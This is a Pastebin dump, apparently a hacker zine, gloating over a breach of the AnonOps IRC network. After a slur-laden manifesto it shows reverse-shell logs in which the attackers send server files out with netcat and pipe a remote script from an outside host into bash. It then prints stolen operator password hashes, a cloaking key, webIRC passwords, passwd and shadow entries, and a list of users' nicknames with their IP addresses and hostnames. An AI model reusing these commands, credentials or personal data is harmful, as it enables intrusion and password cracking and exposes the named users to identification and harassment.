API tools faq
paste
Guest User

ANONOPS KILLED FUCK SHIT

a guest
Jan 12th, 2016
811
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 34.27 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. LOL ANONOPS killed
  4. <>Shit<>Shit<>Shit<>
  5.  
  6.  
  7. ┌─────────────────────────┐
  8. │ :: Table of Contents :: │
  9. ├─────────────────────────┤
  10. │ 0x01 ~ Prefac3 │
  11. ├─────────────────────────┤
  12. │ 0x02 ~ s3rv1c3s pwn │
  13. ├─────────────────────────┤
  14. │ 0x03 ~ iRCd pwn │
  15. ├─────────────────────────┤
  16. │ 0x04 ~ b0x pwn │
  17. ├─────────────────────────┤
  18. │ 0x05 ~ 1ps │
  19. ├─────────────────────────┤
  20. │ 0x06 ~ l0l sh1t │
  21. ├─────────────────────────┤
  22. │ 0x07 ~ FiL3z │
  23. ├─────────────────────────┤
  24. │ 0x08 ~ ex1t │
  25. └─────────────────────────┘
  26.  
  27. :: 0x01 - Prefac3 ::
  28.  
  29. Over the course of the following months, it has become very clear to us that
  30. AnonOps no longer stands for the values of open speech, freedom of opinion and
  31. has instead transformed itself into a network rampent with trolls, abusive
  32. channel operators, and a generally unwelcoming place for those whom wish to
  33. communicate and gather to fight the powers of corruption, and those whom wish
  34. to censor our open internet. Various attempts have been made in the past to
  35. course correct AnonOps, but the totalitarian IRC operator regime has remained
  36. intact.
  37. The AnonOps network prides itself in being "secure", however, such is not
  38. the case. Rather, they employ incompetent and highly unprofessional channel and
  39. IRC operators, allowing their personal grudges to interfere with the operation
  40. of a secure network for Anonymous. Newcomers to the network are welcomed by a
  41. spirit of condescention and arrogance, as any legitimate question or concern is
  42. slowly drowned out by the laughter of the senior members of the chatroom.
  43. Channel operators rather than discourage such behavior, applaud it, joining in,
  44. and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
  45. to speak out against the way the network is ran is met with kick, ban, or zline.
  46. A decentralized organization such as Anonymous cannot thrive on a network ran by
  47. such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
  48. one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
  49. an idea; ideas are bulletproof.
  50. Anonymous cannot be owned or controlled by a small group of faggot
  51. totaltarian operators. Thus we have decided to lombotomize the cancer that is
  52. AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
  53. against us as an agent of censorship, unlulzy pseudo-activism and immense
  54. faggotry, and thus must be eliminated.
  55. AnonOps has proven itself insecure and fault prone in the past. We are here
  56. to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
  57. actions, they have proven themselves against our ideals. Welcome to thecourt of
  58. the internet, AnonOps. You shall be persecuted for your crimes against the
  59. freedom of chats, your utter and repeated failure as an IRC network, your aid to
  60. the spread of namefagging, and your gross negligence in securing the identities
  61. of those whom chat and remain Anonymous on your network.
  62. AnonOps has shown time and time again it is too large of a target, and very
  63. well capable of corrupting the ideals which fuels the fight in every Anon.
  64. As long as AnonOps stay online, they will continue to adulterate our cause,
  65. bastardizing ideals of Anonymous, and running a network where the only lulz to
  66. be had are that of the failures whom chat there and run the network. Such
  67. activity cannot continue.
  68.  
  69. Let's drop the formalities now, and get down to business!
  70.  
  71. :: 0x02 - s3rv1c3s pwn ::
  72. ¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
  73. ~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
  74.  
  75. After probing AnonOps for quite a while, we figured out that they were using
  76. a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
  77. zero day we were able to get ourselves a reverse shell.
  78.  
  79. connect to [REDACTED] from 46.182.105.86 38604
  80. [anonops@ns1 ~]$ id
  81. uid=502(anonops) gid=502(anonops) groups=502(anonops)
  82.  
  83. # Let's go ahead and snag ourselves some juicy files...
  84. [anonops@ns1 ~]$ cd ~/inspircd/run/conf
  85. [anonops@ns1 conf]$ nc htp 443 < inspircd.conf
  86. [anonops@ns1 conf]$ cd ~/services
  87. [anonops@ns1 services]$ nc htp 443 < nick.db
  88. [anonops@ns1 services]$ nc htp 443 < chan.db
  89. [anonops@ns1 services]$ nc htp 443 < oper.db
  90. [anonops@ns1 services]$ nc htp 443 < os_info.db
  91.  
  92. # And then let's go ahead and hook services.
  93. [anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
  94. [anonops@ns1 services]$ killall services; ./services; exit
  95.  
  96.  
  97. :: 0x02 - iRCd pwn ::
  98. ¡Dios Mios!
  99.  
  100. <admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
  101.  
  102. <power hash="sha256"
  103. diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
  104. restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
  105.  
  106. <connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
  107. hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
  108. commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
  109. modes="+xiw">
  110.  
  111. <connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
  112. hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
  113. commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
  114. modes="+xiw">
  115.  
  116. <connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
  117. hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
  118. globalmax="5000" useident="no" modes="+xwi">
  119. <connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
  120. hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
  121. globalmax="5000" useident="no" modes="+wxi">
  122. <connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
  123. hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
  124. globalmax="5000" useident="no" modes="+wxi">
  125. <connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
  126. hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
  127. globalmax="5000" useident="no" modes="+wxi">
  128.  
  129. <connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
  130. softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
  131. localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
  132.  
  133. <cidr ipv4clone="32" ipv6clone="128">
  134. <channels users="50" opers="100">
  135. <banlist chan="*" limit="128">
  136. <options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
  137. fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
  138. cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
  139. allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
  140. serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
  141. invitebypassmodes="no">
  142. <performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
  143. quietbursts="yes" nouserdns="no">
  144. <security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
  145. hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
  146. maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
  147. restrictbannedusers="yes" genericoper="yes" userstats="">
  148. <limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
  149. maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
  150. <whowas groupsize="3" maxgroups="5000" maxkeep="3d">
  151. <insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
  152.  
  153. <badnick nick="ChanServ" reason="Reserved For Services">
  154. <badnick nick="NickServ" reason="Reserved For Services">
  155. <badnick nick="OperServ" reason="Reserved For Services">
  156. <badnick nick="MemoServ" reason="Reserved For Services">
  157. <badnick nick="BotServ" reason="Reserved For Services">
  158. <badnick nick="vHostServ" reason="Reserved For Services">
  159. <badhost host="IRCLOIC@*" reason="wrong server">
  160.  
  161. <uline server="services.anonops.in" silent="yes">
  162. <uline server="defender.anonops.in" silent="yes">
  163.  
  164. # Oper Classes
  165. <class name="Root"
  166. commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
  167. GRELOADMODULE CLEARCACHE">
  168. <class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
  169. GLOADMODULE GUNLOADMODULE SQUIT"
  170. privs="users/auspex channels/auspex servers/auspex users/mass-message
  171. channels/high-join-limit channels/set-permanent users/flood/no-throttle
  172. users/flood/increased-buffers" usermodes="*" chanmodes="*">
  173. <class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
  174. CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
  175. <class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
  176. RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
  177. channels/high-join-limit" usermodes="*" chanmodes="*">
  178. <class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
  179. chanmodes="*" privs="users/mass-message">
  180. <class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
  181. CHECK CHGNAME" usermodes="*" chanmodes="*">
  182. <class name="OperUnlag" privs="users/flood/no-throttle
  183. users/flood/increased-buffers">
  184. <class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
  185. OJOIN FILTER CBAN">
  186.  
  187. # Oper Types
  188. <type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
  189. HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
  190. override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
  191. MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
  192. <type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
  193. ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
  194. override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
  195. MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
  196. <type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
  197. vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
  198. MODEDEVOICE MODEHALFOP MODEDEHALFOP">
  199. <type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
  200. <type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
  201. ServerLink Shutdown" vhost="servadmin.anonops.li"
  202. override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
  203. MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
  204.  
  205. # Oper List
  206. <oper name="power2all" hash="sha256"
  207. password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
  208. host="*@*" vhost="staff.anonops.li" type="RootAdmin">
  209. <oper name="Cody" hash="sha256"
  210. password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
  211. host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  212. <oper name="pi" hash="sha256"
  213. password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
  214. host="*@*" vhost="anonops.staff" type="RootAdmin">
  215. <oper name="p0ke" hash="sha256"
  216. password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
  217. host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  218. <oper name="jaychow" hash="sha256"
  219. password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
  220. host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  221. <oper name="shitstorm" hash="sha256"
  222. password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
  223. host="*@*" vhost="staff.anonops.li" type="RootAdmin">
  224. #<oper name="Isis" hash="sha256"
  225. # password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
  226. # host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  227. #<oper name="Nerdo" hash="sha256"
  228. # password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
  229. # host="*@*" vhost="staff.anonops.li" type="RootAdmin">
  230. <oper name="evilworks" hash="sha256"
  231. password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
  232. host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  233. <oper name="Jupiler" hash="sha256"
  234. password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
  235. host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  236. #<oper name="sharpie" hash="sha256"
  237. # password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
  238. # host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  239. <oper name="daboogieman" hash="sha256"
  240. password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
  241. host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  242. <oper name="pie" hash="sha256"
  243. password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
  244. host="*@*" vhost="staff.anonops.li" type="NetAdmin">
  245.  
  246. # Default Modules Configs
  247. <module name="m_md5.so">
  248. <module name="m_sha256.so">
  249. <module name="m_ripemd160.so">
  250.  
  251. <module name="m_alias.so">
  252. <alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
  253. uline="yes">
  254. <alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
  255. uline="yes">
  256. <alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
  257. uline="yes" operonly="yes">
  258. <alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
  259. uline="yes">
  260. <alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
  261. uline="yes">
  262. <alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
  263. uline="yes">
  264. <alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
  265. <alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
  266. <alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
  267. operonly="yes">
  268. <alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
  269. <alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
  270. <alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
  271. <alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
  272. uline="yes">
  273.  
  274. <module name="m_allowinvite.so">
  275. <module name="m_alltime.so">
  276. <module name="m_auditorium.so">
  277. <auditorium opvisible="no" opcansee="yes" opercansee="yes">
  278. <module name="m_blockcolor.so">
  279. <module name="m_botmode.so">
  280. <module name="m_callerid.so">
  281. <callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
  282. <module name="m_chancreate.so">
  283. <module name="m_chanprotect.so">
  284. <chanprotect noservices="no" qprefix="~" aprefix="&amp;" deprotectself="yes"
  285. deprotectothers="yes">
  286. <module name="m_check.so">
  287. <module name="m_chghost.so">
  288. <module name="m_chgident.so">
  289. <module name="m_chgname.so">
  290. <module name="m_cloaking.so">
  291. <cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
  292. <module name="m_close.so">
  293. <module name="m_clones.so">
  294. <module name="m_conn_umodes.so">
  295. #<module name="m_connectban.so">
  296. #<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
  297. <module name="m_dccallow.so">
  298. <dccallow blockchat="yes" length="0" action="block">
  299. <banfile pattern="*" action="block">
  300. <module name="m_delayjoin.so">
  301. <module name="m_devoice.so">
  302. <module name="m_dnsbl.so">
  303. <dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
  304. reason="DroneBL" duration="30d" bitmask="253">
  305. <dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
  306. reason="ProxyBL" duration="30d" bitmask="253">
  307. <dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
  308. reason="EFnetRBL" duration="30d" bitmask="253">
  309. <module name="m_filter.so">
  310. <filteropts engine="pcre">
  311. <module name="m_globalload.so">
  312. <module name="m_globops.so">
  313. <module name="m_halfop.so">
  314. <module name="m_hidechans.so">
  315. <hidechans affectsopers="false">
  316. <module name="m_hideoper.so">
  317. <module name="m_inviteexception.so">
  318. <module name="m_joinflood.so">
  319. <module name="m_knock.so">
  320. <module name="m_lockserv.so">
  321. <module name="m_maphide.so">
  322. <module name="m_messageflood.so">
  323. <module name="m_muteban.so">
  324. <module name="m_conn_waitpong.so">
  325. <waitpong sendsnotice="yes" killonbadreply="no">
  326. <module name="m_nickflood.so">
  327. <module name="m_nicklock.so">
  328. <module name="m_nonotice.so">
  329. <module name="m_noctcp.so">
  330. <module name="m_nokicks.so">
  331. <module name="m_nonicks.so">
  332.  
  333. #Oper modules
  334. <module name="m_operchans.so">
  335. <module name="m_ojoin.so">
  336. <ojoin prefix="" notice="no" op="no">
  337. <module name="m_operjoin.so">
  338. <operjoin channel="#opers" override="no">
  339. <module name="m_opermotd.so">
  340. <opermotd file="oper.motd" onoper="yes">
  341. <module name="m_override.so">
  342. <module name="m_password_hash.so">
  343. <module name="m_redirect.so">
  344. <module name="m_regex_glob.so">
  345. <module name="m_regex_posix.so">
  346. <module name="m_regex_pcre.so">
  347. <module name="m_regonlycreate.so">
  348. <module name="m_rline.so">
  349. <module name="m_sajoin.so">
  350. <module name="m_sakick.so">
  351. <module name="m_samode.so">
  352. <module name="m_sanick.so">
  353. <module name="m_sapart.so">
  354. <module name="m_satopic.so">
  355. <module name="m_securelist.so">
  356. <securehost exception="*@*.searchirc.org">
  357. <securehost exception="*@*.netsplit.de">
  358. <securehost exception="*@bot.search.mibbit.com">
  359. <module name="m_sethost.so">
  360. <module name="m_setident.so">
  361. <module name="m_setname.so">
  362. <module name="m_seenicks.so">
  363. <module name="m_services_account.so">
  364. <module name="m_showwhois.so">
  365. <module name="m_shun.so">
  366. <shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
  367. <module name="m_spanningtree.so">
  368. <module name="m_sslmodes.so">
  369. <module name="m_ssl_gnutls.so">
  370. <module name="m_sslinfo.so">
  371. <module name="m_stripcolor.so">
  372. <module name="m_svshold.so">
  373. <module name="m_swhois.so">
  374. <module name="m_timedbans.so">
  375. <module name="m_tline.so">
  376. #<module name="m_xline_db.so">
  377.  
  378. #Mibbit Blocks
  379. <module name="m_cgiirc.so">
  380. <cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
  381. mask="64.62.228.82">
  382. <cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
  383. mask="207.192.75.252">
  384. <cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
  385. mask="78.129.202.38">
  386. <cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
  387. mask="109.169.29.95">
  388.  
  389. # P0ke's WebIRC
  390. <cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">
  391.  
  392.  
  393. :: 0x04 - b0x pwn ::
  394.  
  395. [anonops@ns1 run]$ base64 utmp
  396. [anonops@ns1 etc]$ cat passwd
  397. root:x:0:0:root:/root:/bin/bash
  398. bin:x:1:1:bin:/bin:/sbin/nologin
  399. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  400. adm:x:3:4:adm:/var/adm:/sbin/nologin
  401. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  402. sync:x:5:0:sync:/sbin:/bin/sync
  403. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  404. halt:x:7:0:halt:/sbin:/sbin/halt
  405. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  406. news:x:9:13:news:/etc/news:
  407. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  408. operator:x:11:0:operator:/root:/sbin/nologin
  409. games:x:12:100:games:/usr/games:/sbin/nologin
  410. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  411. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  412. nobody:x:99:99:Nobody:/:/sbin/nologin
  413. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  414. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  415. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  416. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  417. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  418. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  419. dbus:x:81:81:System message bus:/:/sbin/nologin
  420. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  421. avahi:x:70:70:Avahi daemon:/:/sbin/nologin
  422. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  423. avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
  424. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  425. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  426. shitstorm:x:500:500::/home/shitstorm:/bin/bash
  427. anonops:x:501:501::/home/anonops:/bin/bash
  428. owen:x:502:502::/home/owen:/bin/bash
  429. ntp:x:38:38::/etc/ntp:/sbin/nologin
  430.  
  431. # IT GETS BETTER!
  432. [anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
  433. root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
  434. shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
  435. anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
  436. owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::
  437.  
  438. :: 0x05 ~ 1pS ::
  439.  
  440. # These were posted on pastebin, but it didnt seem to get as much attention
  441. # as whoever posted it wanted it to get. All these are from a vulnerable
  442. # CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
  443. # What a fucking idiot.
  444.  
  445. ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
  446. ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
  447. ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
  448. AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
  449. Anon23845 95.140.125.37 free-125-37.mediaworksit.net
  450. AnonFin 194.110.178.3 mail2.paf.fi
  451. AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
  452. Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
  453. B2F 173.84.223.70
  454. Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
  455. C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
  456. CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
  457. Caleb 94.75.255.118 hosted-by.leaseweb.com
  458. DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
  459. DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
  460. Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
  461. Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
  462. FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
  463. GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
  464. HIv 95.140.125.37 free-125-37.mediaworksit.net
  465. Haze 12.18.245.219
  466. Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
  467. Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
  468. Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
  469. Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
  470. LOLOL 0.0.7.209
  471. LTD 174.127.99.174 174.127.99.174.static.midphase.com
  472. Lumina 186.188.228.113
  473. M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
  474. Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
  475. Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
  476. RetSnom 138.199.70.143
  477. Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
  478. ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
  479. Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
  480. Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
  481. Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
  482. Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
  483. UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
  484. Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
  485. anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
  486. anon4347 75.149.43.213 fabgraphics.com
  487. anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
  488. bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
  489. boho 173.23.64.22 173-23-64-22.client.mchsi.com
  490. br4incr4sh 81.56.209.237 server.abcdeflorent.com
  491. chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
  492. cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
  493. cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
  494. comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
  495. digger 0.0.0.2
  496. don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
  497. dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
  498. e 209.212.149.109 za.l.to
  499. eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
  500. elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
  501. facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
  502. fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
  503. g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
  504. gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
  505. gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
  506. gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
  507. ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
  508. hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
  509. heckl 68.68.108.159
  510. imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
  511. k1tt3n 213.251.194.76
  512. k3ymaster 173.245.64.95
  513. koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
  514. lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
  515. locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
  516. loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
  517. madmaster 77.247.181.162 chomsky.torservers.net
  518. manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
  519. mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
  520. naSignal 193.138.216.101 tor-proxy.vm.31173.se
  521. nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
  522. nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
  523. nononn 46.239.119.58 host095577.olf.sgsnet.se
  524. nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
  525. opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
  526. pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
  527. ph33r 68.170.73.247 247.73.170.68.belairinternet.com
  528. phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
  529. qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
  530. risk 202.59.80.158
  531. savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
  532. sd 0.0.7.209
  533. sdk 201.82.181.124 c952b57c.virtua.com.br
  534. sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
  535. soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
  536. sprinkles 213.46.138.76 d138076.upc-d.chello.nl
  537. subz3r0e 41.202.225.156
  538. triPPy 173.245.64.183 173.245.64.160
  539. tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
  540. u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
